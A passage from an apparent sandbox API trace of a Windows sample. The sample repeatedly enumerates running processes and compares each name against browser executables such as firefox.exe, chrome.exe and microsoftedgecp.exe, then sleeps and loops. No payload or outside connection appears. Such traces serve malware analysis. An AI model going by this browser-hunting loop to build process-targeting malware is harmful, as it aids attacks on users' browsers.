(lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0165.569] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0165.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.569] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.570] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.571] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0165.572] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0165.573] CloseHandle (hObject=0xe8) returned 1 [0165.573] Sleep (dwMilliseconds=0x3e8) [0166.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0166.730] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.730] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0166.730] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0166.730] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0166.730] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0166.730] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0166.730] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0166.731] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0166.731] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0166.731] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0166.731] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0166.731] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0166.731] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0166.732] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0166.732] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0166.732] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0166.732] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0166.732] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.732] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0166.732] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0166.732] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0166.732] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0166.732] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.732] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0166.733] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0166.733] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0166.733] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0166.733] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0166.733] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.733] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.733] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0166.734] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0166.734] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0166.734] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0166.734] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0166.734] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0166.734] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0166.734] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0166.734] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0166.734] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.734] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0166.735] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0166.735] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0166.735] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0166.735] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0166.735] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.735] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0166.735] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0166.735] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0166.735] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0166.735] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0166.735] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0166.736] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0166.736] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0166.736] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0166.736] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0166.736] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.736] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.737] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.737] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.738] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.738] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.738] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.738] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.738] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.738] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.739] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.739] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0166.740] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0166.740] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0166.740] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0166.740] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0166.740] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.740] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.740] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.741] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0166.742] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0166.742] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0166.742] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0166.742] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0166.742] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.742] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0166.743] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0166.743] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0166.743] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0166.743] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0166.743] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0166.743] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0166.743] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0166.743] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0166.743] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0166.743] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.744] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.744] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.744] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.744] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0166.744] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0166.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0166.744] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0166.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0166.745] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.745] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0166.745] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0166.745] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0166.745] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0166.745] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0166.745] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.745] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0166.746] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0166.746] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0166.746] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0166.746] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0166.746] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0166.746] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0166.746] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0166.746] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0166.746] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0166.746] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0166.747] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0166.747] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0166.747] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0166.747] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0166.747] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0166.748] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0166.748] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0166.748] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0166.748] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0166.748] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0166.748] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0166.748] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0166.748] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0166.748] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0166.748] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0166.749] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0166.749] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0166.749] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0166.749] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0166.749] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.749] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0166.750] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0166.750] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0166.750] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0166.750] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0166.750] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.750] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 